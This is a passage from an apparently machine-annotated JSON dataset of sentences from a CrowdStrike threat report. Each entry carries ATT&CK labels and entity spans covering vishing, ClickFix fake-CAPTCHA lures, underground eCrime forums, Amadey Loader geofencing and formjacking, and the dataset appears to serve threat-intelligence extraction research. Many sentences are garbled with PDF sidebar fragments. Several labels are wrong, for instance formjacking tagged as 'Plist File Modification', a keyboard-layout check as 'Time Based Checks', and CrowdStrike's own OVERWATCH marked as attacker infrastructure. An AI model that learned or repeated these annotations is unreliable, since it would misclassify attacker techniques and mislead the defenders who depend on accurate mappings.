REPORTING access.", "sentence_text": "Vishing is a type of social engineering technique in which an adversary PERIOD, CROWDSTRIKE calls a victim to encourage them to provide credentials or take action on their OVERWATCH AND THE endpoint.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "call victims to encourage providing credentials or taking action", "entities": [ { "text": "Vishing", "start": 0, "end": 7, "label": "Action" }, { "text": "calls a victim ", "start": 92, "end": 107, "label": "Action" }, { "text": " provide credentials ", "start": 127, "end": 148, "label": "Action" }, { "text": "OVERWATCH", "start": 172, "end": 181, "label": "Infrastructure_Indicator" }, { "text": "adversary", "start": 62, "end": 71, "label": "ThreatActor" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p9-s39-31b7a4", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 9, "sentence_id": 39, "context_before": "Vishing is a type of social engineering technique in which an adversary PERIOD, CROWDSTRIKE calls a victim to encourage them to provide credentials or take action on their OVERWATCH AND THE endpoint.", "sentence_text": "Along with facilitating fraud, eCrime adversaries — including CROWDSTRIKE FALCON® COMPLETE NEXT-GEN MDR TEAM OBSERVED CURLY SPIDER and MUTANT SPIDER — have used vishing to gain initial access for NEARLY 1,000 VISHING-RELATED ransomware groups (see the InitialAccessBrokers section on page 14).", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "use vishing to gain initial access for ransomware", "entities": [ { "text": " eCrime adversaries", "start": 30, "end": 49, "label": "ThreatActor" }, { "text": "CURLY SPIDER", "start": 118, "end": 130, "label": "ThreatActor" }, { "text": "MUTANT SPIDER ", "start": 135, "end": 149, "label": "ThreatActor" }, { "text": "vishing", "start": 161, "end": 168, "label": "Action" }, { "text": "gain initial access", "start": 172, "end": 191, "label": "Action" }, { "text": " ransomware groups", "start": 224, "end": 242, "label": "ThreatActor" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p9-s40-867160", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 9, "sentence_id": 40, "context_before": "Along with facilitating fraud, eCrime adversaries — including CROWDSTRIKE FALCON® COMPLETE NEXT-GEN MDR TEAM OBSERVED CURLY SPIDER and MUTANT SPIDER — have used vishing to gain initial access for NEARLY 1,000 VISHING-RELATED ransomware groups (see the InitialAccessBrokers section on page 14).", "sentence_text": "Similarly, INCIDENTS GLOBALLY.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p9-s41-7e8c27", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 9, "sentence_id": 41, "context_before": "Similarly, INCIDENTS GLOBALLY.", "sentence_text": "MOST operators or affiliates of BGH adversaries ROYAL SPIDER, TUNNEL SPIDER, and INCIDENTS IMPACTED NORTH WANDERING SPIDER have used vishing in their operations.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "use vishing in operations", "entities": [ { "text": " BGH adversaries ", "start": 31, "end": 48, "label": "ThreatActor" }, { "text": " ROYAL SPIDER", "start": 47, "end": 60, "label": "ThreatActor" }, { "text": "TUNNEL SPIDER", "start": 62, "end": 75, "label": "ThreatActor" }, { "text": "WANDERING SPIDER", "start": 106, "end": 122, "label": "ThreatActor" }, { "text": "vishing ", "start": 133, "end": 141, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p9-s42-914868", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 9, "sentence_id": 42, "context_before": "MOST operators or affiliates of BGH adversaries ROYAL SPIDER, TUNNEL SPIDER, and INCIDENTS IMPACTED NORTH WANDERING SPIDER have used vishing in their operations.", "sentence_text": "AMERICA-BASED ENTITIES, LIKELY DUE TO THE UBIQUITY OF THE In late 2024, a user highly likely associated with MUTANT SPIDER posted on the ENGLISH LANGUAGE AS WELL AS Russian-language forum Exploit, claiming to prefer North America-based targets THE TARGETS’ HIGHER REVENUE.\nover those based in Europe because they were more likely to pay higher ransoms.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p9-s43-14b278", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 9, "sentence_id": 43, "context_before": "AMERICA-BASED ENTITIES, LIKELY DUE TO THE UBIQUITY OF THE In late 2024, a user highly likely associated with MUTANT SPIDER posted on the ENGLISH LANGUAGE AS WELL AS Russian-language forum Exploit, claiming to prefer North America-based targets THE TARGETS’ HIGHER REVENUE.\nover those based in Europe because they were more likely to pay higher ransoms.", "sentence_text": "However, vishing will likely become a more significant threat to Europe-based entities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p9-s44-38de67", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 9, "sentence_id": 44, "context_before": "However, vishing will likely become a more significant threat to Europe-based entities.", "sentence_text": "This assessment is made with moderate confidence based on the recent high-impact vishing incidents affecting entities in Europe (see the SCATTERED SPIDERTargetsU.K.RetailSectorin2025 section on page 8) and because eCrime adversaries are increasingly leveraging native speakers of their target regions in their vishing campaigns.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.008", "name": "Malvertising" } ], "procedure": "leveraging native speakers in vishing campaigns", "entities": [ { "text": "Targets", "start": 153, "end": 160, "label": "Action" }, { "text": "U.K.RetailSector", "start": 160, "end": 176, "label": "Infrastructure_Indicator" }, { "text": "SCATTERED SPIDER", "start": 137, "end": 153, "label": "ThreatActor" }, { "text": " eCrime adversaries", "start": 213, "end": 232, "label": "ThreatActor" }, { "text": "leveraging", "start": 250, "end": 260, "label": "Action" }, { "text": "vishing", "start": 310, "end": 317, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p10-s45-94b573", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 10, "sentence_id": 45, "context_before": "This assessment is made with moderate confidence based on the recent high-impact vishing incidents affecting entities in Europe (see the SCATTERED SPIDERTargetsU.K.RetailSectorin2025 section on page 8) and because eCrime adversaries are increasingly leveraging native speakers of their target regions in their vishing campaigns.", "sentence_text": "FAKE CAPTCHAs REMAIN A COMMON DELIVERY METHOD Starting in mid-2024, eCrime adversaries have begun widely adopting CAPTCHA lures (aka ClickFix) to deliver malware.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "using CAPTCHA lures (ClickFix) to deliver malware", "entities": [ { "text": "FAKE CAPTCHAs ", "start": 0, "end": 14, "label": "MalwareTool" }, { "text": "eCrime adversaries", "start": 68, "end": 86, "label": "ThreatActor" }, { "text": " CAPTCHA lures", "start": 113, "end": 127, "label": "MalwareTool" }, { "text": " ClickFix", "start": 132, "end": 141, "label": "MalwareTool" }, { "text": " malware", "start": 153, "end": 161, "label": "MalwareTool" }, { "text": "adopting", "start": 105, "end": 113, "label": "Action" }, { "text": "deliver", "start": 146, "end": 153, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p10-s46-da4077", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 10, "sentence_id": 46, "context_before": "FAKE CAPTCHAs REMAIN A COMMON DELIVERY METHOD Starting in mid-2024, eCrime adversaries have begun widely adopting CAPTCHA lures (aka ClickFix) to deliver malware.", "sentence_text": "IN 2024 AND 2025, CROWDSTRIKE Identified campaigns used phishing emails, malicious advertising (malvertising), and IDENTIFIED OVER 1,000 INCIDENTS search engine optimization (SEO) poisoning to direct targets to fake CAPTCHA pages.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "using phishing emails, malvertising, and SEO poisoning to direct to fake CAPTCHA pages", "entities": [ { "text": " phishing", "start": 55, "end": 64, "label": "Action" }, { "text": "malicious advertising", "start": 73, "end": 94, "label": "Action" }, { "text": " targets", "start": 199, "end": 207, "label": "Action" }, { "text": "malvertising", "start": 96, "end": 108, "label": "Action" }, { "text": " fake CAPTCHA pages", "start": 210, "end": 229, "label": "MalwareTool" }, { "text": "search engine optimization (SEO) poisoning", "start": 147, "end": 189, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p10-s47-ad8cb9", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 10, "sentence_id": 47, "context_before": "IN 2024 AND 2025, CROWDSTRIKE Identified campaigns used phishing emails, malicious advertising (malvertising), and IDENTIFIED OVER 1,000 INCIDENTS search engine optimization (SEO) poisoning to direct targets to fake CAPTCHA pages.", "sentence_text": "IMPACTING EUROPE-BASED While campaigns leveraging CAPTCHA lures are often opportunistic, some eCrime CUSTOMERS THAT INVOLVED threat actors tailor fake CAPTCHAs to their specific targets, such as hospitality and CAPTCHA LURES (FIGURE 3).", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.002", "name": "Spearphishing Link" } ], "procedure": "tailor fake CAPTCHAs to specific targets", "entities": [ { "text": " eCrime", "start": 93, "end": 100, "label": "ThreatActor" }, { "text": "threat actors ", "start": 125, "end": 139, "label": "ThreatActor" }, { "text": "fake CAPTCHAs", "start": 146, "end": 159, "label": "MalwareTool" }, { "text": "CAPTCHA LURES", "start": 211, "end": 224, "label": "MalwareTool" }, { "text": " hospitality", "start": 194, "end": 206, "label": "Infrastructure_Indicator" }, { "text": "tailor", "start": 139, "end": 145, "label": "Action" }, { "text": " leveraging CAPTCHA lures", "start": 38, "end": 63, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p10-s48-e6a8d3", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 10, "sentence_id": 48, "context_before": "IMPACTING EUROPE-BASED While campaigns leveraging CAPTCHA lures are often opportunistic, some eCrime CUSTOMERS THAT INVOLVED threat actors tailor fake CAPTCHAs to their specific targets, such as hospitality and CAPTCHA LURES (FIGURE 3).", "sentence_text": "travel entities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p10-s49-861b48", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 10, "sentence_id": 49, "context_before": "travel entities.", "sentence_text": "eCrime services on the Russian-language eCrime forums Exploit and XSS have advertised several tools that can be used to create customizable or ready-made fake CAPTCHA pages for Windows, macOS, and Linux (see the Underground Ecosystem section on page 11).", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.002", "name": "Tool" } ], "procedure": "advertise tools for creating fake CAPTCHA pages", "entities": [ { "text": "eCrime", "start": 0, "end": 6, "label": "ThreatActor" }, { "text": " XSS", "start": 65, "end": 69, "label": "Infrastructure_Indicator" }, { "text": "advertised", "start": 75, "end": 85, "label": "Action" }, { "text": "tools", "start": 94, "end": 99, "label": "MalwareTool" }, { "text": " create", "start": 119, "end": 126, "label": "Action" }, { "text": " fake CAPTCHA pages", "start": 153, "end": 172, "label": "MalwareTool" }, { "text": " Windows", "start": 176, "end": 184, "label": "Infrastructure_Indicator" }, { "text": "macOS", "start": 186, "end": 191, "label": "Infrastructure_Indicator" }, { "text": " Linux ", "start": 196, "end": 203, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p10-s50-c9dc82", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 10, "sentence_id": 50, "context_before": "eCrime services on the Russian-language eCrime forums Exploit and XSS have advertised several tools that can be used to create customizable or ready-made fake CAPTCHA pages for Windows, macOS, and Linux (see the Underground Ecosystem section on page 11).", "sentence_text": "These eCrime services make CAPTCHA lures readily available for a broad range of threat actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p11-s51-2ef75b", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 11, "sentence_id": 51, "context_before": "These eCrime services make CAPTCHA lures readily available for a broad range of threat actors.", "sentence_text": "Underground Ecosystem\nThough law enforcement operations occasionally seize infrastructure and arrest administrators operating prominent Europe-based eCrime platforms, the European — and specifically the Russian-language — underground ecosystem remains robust.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p11-s52-20cf29", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 11, "sentence_id": 52, "context_before": "Underground Ecosystem\nThough law enforcement operations occasionally seize infrastructure and arrest administrators operating prominent Europe-based eCrime platforms, the European — and specifically the Russian-language — underground ecosystem remains robust.", "sentence_text": "RUSSIAN-LANGUAGE eCRIME FORUMS For nearly three decades, eCrime threat actors have coalesced on Russian-language underground forums.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "coalesce on Russian-language underground forums", "entities": [ { "text": " coalesced", "start": 82, "end": 92, "label": "Action" }, { "text": " eCrime threat actors", "start": 56, "end": 77, "label": "ThreatActor" }, { "text": " Russian-language underground forums", "start": 95, "end": 131, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p11-s53-5a26d3", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 11, "sentence_id": 53, "context_before": "RUSSIAN-LANGUAGE eCRIME FORUMS For nearly three decades, eCrime threat actors have coalesced on Russian-language underground forums.", "sentence_text": "The increasing number of eCrime forums has allowed threat actors to share knowledge on tradecraft and tools as well as advertise and develop their criminal services.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Use eCrime forums to share tradecraft and tools and to advertise or develop criminal services.", "entities": [ { "text": "eCrime forums", "start": 25, "end": 38, "label": "Infrastructure_Indicator" }, { "text": "threat actors", "start": 51, "end": 64, "label": "ThreatActor" }, { "text": "share knowledge on tradecraft and tools", "start": 68, "end": 107, "label": "Action" }, { "text": "advertise and develop their criminal services", "start": 119, "end": 164, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p11-s54-a9c9f6", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 11, "sentence_id": 54, "context_before": "The increasing number of eCrime forums has allowed threat actors to share knowledge on tradecraft and tools as well as advertise and develop their criminal services.", "sentence_text": "Some forums, including Exploit and XSS — which was impacted by recent law enforcement arrests and clearnet domain seizure — accommodate general eCrime discussions; however, numerous forums specialize in specific eCrime services or monetization methods, including the following:\n• Carding:", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "conduct general eCrime discussions; specialize in specific services/monetization methods", "entities": [ { "text": " Exploit", "start": 22, "end": 30, "label": "Infrastructure_Indicator" }, { "text": " XSS ", "start": 34, "end": 39, "label": "Infrastructure_Indicator" }, { "text": "eCrime services ", "start": 212, "end": 228, "label": "MalwareTool" }, { "text": "Carding", "start": 280, "end": 287, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p11-s56-11aab4", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 11, "sentence_id": 56, "context_before": "•", "sentence_text": "Probiv: The term “probiv” (пробив) describes a prominent service in the Russian-language underground ecosystem in which users trade personal information obtained from leaked data or recruit insiders with specific data access.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1589.001", "name": "Credentials" } ], "procedure": "trade personal information from leaked data; recruit insiders with data access", "entities": [ { "text": " Russian-language underground ecosystem", "start": 71, "end": 110, "label": "Infrastructure_Indicator" }, { "text": "trade personal information", "start": 126, "end": 152, "label": "Action" }, { "text": "data access", "start": 213, "end": 224, "label": "Action" }, { "text": " recruit insiders ", "start": 181, "end": 199, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p11-s57-598ee8", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 11, "sentence_id": 57, "context_before": "Probiv: The term “probiv” (пробив) describes a prominent service in the Russian-language underground ecosystem in which users trade personal information obtained from leaked data or recruit insiders with specific data access.", "sentence_text": "Russian authorities have recently cracked down on data leaks and probiv services, partially due to their role in facilitating investigative journalism.8 •", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p11-s59-6fdadb", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 11, "sentence_id": 59, "context_before": "Ransomware:", "sentence_text": "Following CARBON SPIDER’s highly publicized DarkSide attack in May 2021, prominent Russian-language eCrime forums banned ransomware-related discussions.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "conduct ransomware attacks; ban ransomware discussions on forums", "entities": [ { "text": " CARBON SPIDER", "start": 9, "end": 23, "label": "ThreatActor" }, { "text": "DarkSide attack", "start": 44, "end": 59, "label": "Action" }, { "text": " Russian-language eCrime forums ", "start": 82, "end": 114, "label": "Infrastructure_Indicator" }, { "text": "ransomware", "start": 121, "end": 131, "label": "MalwareTool" }, { "text": "banned", "start": 114, "end": 120, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p11-s60-3aeb2f", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 11, "sentence_id": 60, "context_before": "Following CARBON SPIDER’s highly publicized DarkSide attack in May 2021, prominent Russian-language eCrime forums banned ransomware-related discussions.", "sentence_text": "This eCrime ecosystem accommodates a broad base of threat actors and enabling services, including initial access and data brokers, bulletproof hosting providers, cash-out services and cryptocurrency mixers, malware as a service (MaaS) and RaaS operators, and spammers.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.002", "name": "Tool" } ], "procedure": "Use an eCrime ecosystem that provides enabling services such as initial access brokers, data brokers, bulletproof hosting, cash-out services, cryptocurrency mixers, MaaS, RaaS operators, and spammers.", "entities": [ { "text": "accommodates a broad base of threat actors and enabling services", "start": 22, "end": 86, "label": "Action" }, { "text": "threat actors", "start": 51, "end": 64, "label": "ThreatActor" }, { "text": "initial access and data brokers", "start": 98, "end": 129, "label": "ThreatActor" }, { "text": "bulletproof hosting providers", "start": 131, "end": 160, "label": "Infrastructure_Indicator" }, { "text": "cryptocurrency mixers", "start": 184, "end": 205, "label": "Infrastructure_Indicator" }, { "text": "malware as a service (MaaS)", "start": 207, "end": 234, "label": "MalwareTool" }, { "text": "RaaS operators", "start": 239, "end": 253, "label": "ThreatActor" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p11-s61-0101a2", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 11, "sentence_id": 61, "context_before": "This eCrime ecosystem accommodates a broad base of threat actors and enabling services, including initial access and data brokers, bulletproof hosting providers, cash-out services and cryptocurrency mixers, malware as a service (MaaS) and RaaS operators, and spammers.", "sentence_text": "6 https://www.justice.gov/archives/opa/pr/ukrainian-national-who-co-founded-cybercrime-marketplace-sentenced-18-years-prison\n7 In formjacking (aka Magecart, digital skimming, sniffing) operations, threat actors inject malicious JavaScript code into websites to harvest customer payment card information and/or personally identifiable information (PII) from websites’ front ends.\n8 https://meduza.io/en/feature/2025/07/29/too-much-is-slipping-through\n9", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1647", "name": "Plist File Modification" } ], "procedure": "inject malicious code into websites to harvest payment card info and PII", "entities": [ { "text": "threat actors", "start": 197, "end": 210, "label": "ThreatActor" }, { "text": "inject ", "start": 211, "end": 218, "label": "Action" }, { "text": "malicious JavaScript code", "start": 218, "end": 243, "label": "MalwareTool" }, { "text": "websites ", "start": 249, "end": 258, "label": "Infrastructure_Indicator" }, { "text": " harvest", "start": 260, "end": 268, "label": "Action" }, { "text": " formjacking", "start": 129, "end": 141, "label": "Action" }, { "text": "sniffing", "start": 175, "end": 183, "label": "Action" }, { "text": "digital skimming", "start": 157, "end": 173, "label": "Action" }, { "text": " Magecart", "start": 146, "end": 155, "label": "Action" }, { "text": " websites’ front ends", "start": 356, "end": 377, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p12-s62-f01987", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 12, "sentence_id": 62, "context_before": "6 https://www.justice.gov/archives/opa/pr/ukrainian-national-who-co-founded-cybercrime-marketplace-sentenced-18-years-prison\n7 In formjacking (aka Magecart, digital skimming, sniffing) operations, threat actors inject malicious JavaScript code into websites to harvest customer payment card information and/or personally identifiable information (PII) from websites’ front ends.\n8 https://meduza.io/en/feature/2025/07/29/too-much-is-slipping-through\n9", "sentence_text": "Prohibitions on Targeting Entities in Russia and the CIS Region", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p12-s63-f618de", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 12, "sentence_id": 63, "context_before": "Prohibitions on Targeting Entities in Russia and the CIS Region", "sentence_text": "The prohibition on targeting organizations and citizens of Russia and Commonwealth of Independent States (CIS) countries has long been a tacit and often codified rule in the Russian-language underground ecosystem.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p12-s64-579de1", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 12, "sentence_id": 64, "context_before": "The prohibition on targeting organizations and citizens of Russia and Commonwealth of Independent States (CIS) countries has long been a tacit and often codified rule in the Russian-language underground ecosystem.", "sentence_text": "Numerous Russian-speaking MaaS and RaaS operators prohibit their customers and affiliates from targeting Russia and the CIS region.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p12-s65-2d768f", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 12, "sentence_id": 65, "context_before": "Numerous Russian-speaking MaaS and RaaS operators prohibit their customers and affiliates from targeting Russia and the CIS region.", "sentence_text": "HAZARD SPIDER advertised AmadeyLoader on the XSS forum and restricted its operation in Russia and allied countries.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Advertise AmadeyLoader on the XSS forum while restricting its operation in Russia and allied countries.", "entities": [ { "text": "HAZARD SPIDER", "start": 0, "end": 13, "label": "ThreatActor" }, { "text": "advertised AmadeyLoader", "start": 14, "end": 37, "label": "Action" }, { "text": "AmadeyLoader", "start": 25, "end": 37, "label": "MalwareTool" }, { "text": "XSS forum", "start": 45, "end": 54, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p12-s66-9a57ec", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 12, "sentence_id": 66, "context_before": "HAZARD SPIDER advertised AmadeyLoader on the XSS forum and restricted its operation in Russia and allied countries.", "sentence_text": "Amadey Loader enforces this prohibition by not executing command-and-control (C2)\ncommands if CIS countries’ keyboard layout IDs are identified on the system.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1497.003", "name": "Time Based Checks" } ], "procedure": "enforce geographic prohibition by checking keyboard layout IDs", "entities": [ { "text": "Amadey Loader", "start": 0, "end": 13, "label": "MalwareTool" }, { "text": "(C2)\ncommands", "start": 77, "end": 90, "label": "Infrastructure_Indicator" }, { "text": "CIS countries’ keyboard layout IDs", "start": 94, "end": 128, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p12-s67-8c131c", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 12, "sentence_id": 67, "context_before": "Amadey Loader enforces this prohibition by not executing command-and-control (C2)\ncommands if CIS countries’ keyboard layout IDs are identified on the system.", "sentence_text": "Russian-speaking eCrime threat actors ostracized actors that violated regional targeting prohibitions on eCrime forums.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p12-s68-927810", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 12, "sentence_id": 68, "context_before": "Russian-speaking eCrime threat actors ostracized actors that violated regional targeting prohibitions on eCrime forums.", "sentence_text": "In March 2024, a BRASH SPIDER-associated XSS forum user accused COOKIE SPIDER of targeting the CIS region and attempted to remove COOKIE SPIDER from the forum.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": null, "procedure": "Attempt to remove COOKIE SPIDER from an eCrime forum for violating regional targeting prohibitions.", "entities": [ { "text": "BRASH SPIDER", "start": 17, "end": 29, "label": "ThreatActor" }, { "text": "COOKIE SPIDER", "start": 130, "end": 143, "label": "ThreatActor" }, { "text": "attempted to remove COOKIE SPIDER from the forum", "start": 110, "end": 158, "label": "Action" }, { "text": "XSS forum", "start": 41, "end": 50, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p12-s69-5610ef", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 12, "sentence_id": 69, "context_before": "In March 2024, a BRASH SPIDER-associated XSS forum user accused COOKIE SPIDER of targeting the CIS region and attempted to remove COOKIE SPIDER from the forum.", "sentence_text": "European threat actors used English-language cybercriminal venues to access malware development and ransomware affiliate recruitment opportunities.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "Use English-language cybercriminal venues to access malware development and ransomware affiliate recruitment opportunities.", "entities": [ { "text": "European threat actors", "start": 0, "end": 22, "label": "ThreatActor" }, { "text": "used English-language cybercriminal venues", "start": 23, "end": 65, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p12-s70-1a035e", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 12, "sentence_id": 70, "context_before": "European threat actors used English-language cybercriminal venues to access malware development and ransomware affiliate recruitment opportunities.", "sentence_text": "They provide easy access to compromised data, commoditized tooling, and money laundering services, all supported by trust-building features such as escrow and reputation scores.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.002", "name": "Tool" } ], "procedure": "provide access to compromised data, tooling, and money laundering services", "entities": [ { "text": " provide easy access", "start": 4, "end": 24, "label": "Action" }, { "text": " compromised data", "start": 27, "end": 44, "label": "Infrastructure_Indicator" }, { "text": " money laundering services", "start": 71, "end": 97, "label": "Action" }, { "text": " escrow", "start": 147, "end": 154, "label": "Infrastructure_Indicator" }, { "text": "reputation scores", "start": 159, "end": 176, "label": "Infrastructure_Indicator" }, { "text": "commoditized tooling", "start": 46, "end": 66, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p12-s71-bda9f1", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 12, "sentence_id": 71, "context_before": "They provide easy access to compromised data, commoditized tooling, and money laundering services, all supported by trust-building features such as escrow and reputation scores.", "sentence_text": "On forums such as BreachForums, commodities typically include databases containing compromised personal and corporate data, access credentials for corporate VPNs and cloud environments, and tooling such as infostealers, loaders, and phishing kits.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.002", "name": "Tool" } ], "procedure": "trade compromised data, credentials, and malicious tooling", "entities": [ { "text": "BreachForums,", "start": 18, "end": 31, "label": "Infrastructure_Indicator" }, { "text": "compromised personal and corporate data", "start": 83, "end": 122, "label": "Infrastructure_Indicator" }, { "text": "databases", "start": 62, "end": 71, "label": "Infrastructure_Indicator" }, { "text": " access credentials", "start": 123, "end": 142, "label": "Infrastructure_Indicator" }, { "text": "VPNs", "start": 157, "end": 161, "label": "Infrastructure_Indicator" }, { "text": "cloud environments", "start": 166, "end": 184, "label": "Infrastructure_Indicator" }, { "text": " infostealers", "start": 205, "end": 218, "label": "MalwareTool" }, { "text": " loaders", "start": 219, "end": 227, "label": "MalwareTool" }, { "text": " phishing kits", "start": 232, "end": 246, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p12-s72-b1dfc7", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 12, "sentence_id": 72, "context_before": "On forums such as BreachForums, commodities typically include databases containing compromised personal and corporate data, access credentials for corporate VPNs and cloud environments, and tooling such as infostealers, loaders, and phishing kits.", "sentence_text": "Vendors also offer tutorials, initial access broker listings, and laundering services that enable threat actors to monetize their operations.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.004", "name": "Exploits" } ], "procedure": "offer tutorials, access broker listings, and laundering services to monetize operations", "entities": [ { "text": "Vendors", "start": 0, "end": 7, "label": "ThreatActor" }, { "text": " offer", "start": 12, "end": 18, "label": "Action" }, { "text": "enable", "start": 91, "end": 97, "label": "Action" }, { "text": " threat actors", "start": 97, "end": 111, "label": "ThreatActor" }, { "text": " monetize ", "start": 114, "end": 124, "label": "Action" }, { "text": " initial access broker", "start": 29, "end": 51, "label": "Infrastructure_Indicator" }, { "text": " laundering services", "start": 65, "end": 85, "label": "Infrastructure_Indicator" } ] }, { "uid": 